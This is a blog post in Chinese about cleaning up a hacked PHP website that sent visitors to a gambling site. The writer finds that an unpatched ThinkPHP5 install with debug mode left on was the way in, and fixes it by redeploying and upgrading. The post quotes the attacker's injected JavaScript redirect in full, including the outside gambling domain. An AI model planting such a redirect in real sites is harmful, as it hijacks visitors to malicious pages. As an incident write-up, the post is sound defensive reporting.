某天打开我的网站一看,首页都没啥反应,点啥都直接给我跳转到博彩网站了。
开始排查问题,登录服务器,进入项目目录,git status一下,发现有俩文件红了,入口文件index,php和某个引入的JS文件。发现JS里面被写入了一段重定向:
var c = document.cookie;
if (c.indexOf('isfirstvisited=false') != -1) {
} else {
var d = new Date();
d.setFullYear(d.getFullYear() + 1);
document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString();
location = 'https://897232.top'
}
问题找到了,直接把这段删了就行,入口文件也改回来,问题解决。
************************** 分割线 **************************
哎,时隔两天又破防了,我改回来隔天又给我改坏了,得想个办法彻底给小黑子封了。
开始寻找一下漏洞,在项目目录运行一下git status,发现多了几个文件:
手段还是跟之前一样,得彻底解决一下,不然改都改烦死了。
捣鼓半天,看了服务器的各种操作日志,没有发现异常用户,操作日志也看不出啥结果。
然后买了华为云的Agent服务,看一下这玩意儿能不能记录到黑客行为
************************** 分割线 **************************
3天后,我又来了,查看安全警告果然记录了异常日志。
不过还是不知道对方的具体手段,本来想写个shell脚本,监控到文件变化,给我发送通知,自动把发生变更的那俩文件复制过去替换掉,这样也省得我天天改了,不过想想还是算了,治标不治本,漏洞还是要找。
然后我发现我用的Thinkphp5框架的那个版本是有漏洞的,并且我的调试模式忘了关了。根据对方在我文件夹里面留下的route.php文件,他应该是用“蚁剑工具”给我弄的木马。
尝试解决方案:
1.删掉原来的整个项目目录,里面可能还有木马文件。
2.升级版本框架,重新部署代码,关闭调试模式。
************************** 分割线 **************************
一周后:
哈哈哈,哥们儿网站好了,处理之后一个多星期,终于没有篡改信息了。
结语:作为一个php小菜鸟,技术功底还是太差了。要学习的东西还有很多,有空了还是要多学习一下安全攻防知识,虽然这次事故还是出在自己粗心大意上。之前21年的时候我也被搞过一次,还是管局打电话我关停了我的备案,各位小伙伴还是要注意一下的。
我自己站的贴子,欢迎来玩:http://moclog.cn/article/575?tkw=ag==
扫一扫
453
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
